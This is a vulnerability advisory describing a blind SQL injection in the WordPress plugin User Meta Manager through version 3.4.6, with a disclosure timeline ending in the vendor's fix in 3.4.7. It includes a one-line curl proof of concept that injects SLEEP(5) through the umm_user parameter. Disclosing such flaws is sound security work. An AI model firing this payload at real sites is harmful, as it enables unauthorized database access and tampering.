User Meta Manager [Blind SQLi]

WordPress plugin User Meta Manager suffers for a Blind SQL Injection vulnerability.

Description

AJAX actions umm_edit_user_meta and umm_delete_user_meta of the User Meta Manager for WordPress plugin up to v3.4.6 are vulnerable to blind SQL injection attacks. A registered user can pass arbitrary MySQL commands to umm_user GET param.

PoC

curl -c ${USER_COOKIES} \
    "http://${VULN_SITE}/wp-admin/admin-ajax.php\?action=umm_switch_action\
    &umm_sub_action=[umm_delete_user_meta|umm_edit_user_meta]&umm_user=SLEEP(5)"

WordPress Plugins Blind SQLi SQL Injection SQLi
INFO
TIMELINE
  • 2015-12-29:
    Vendor notified via support forums in WordPress.org
  • 2015-12-29:
    Vendor notified via contact form in his site
  • 2015-12-30:
    Requested a CVE ID
  • 2016-01-29:
    WordPress security team notified about the issue
  • 2016-02-02:
    Vendor released version 3.4.7
  • 2016-02-02:
    Verified that this exploit no longer applies in version 3.4.7
  • 2016-02-05:
    Requested a CVE ID (no response from 2015-12-30)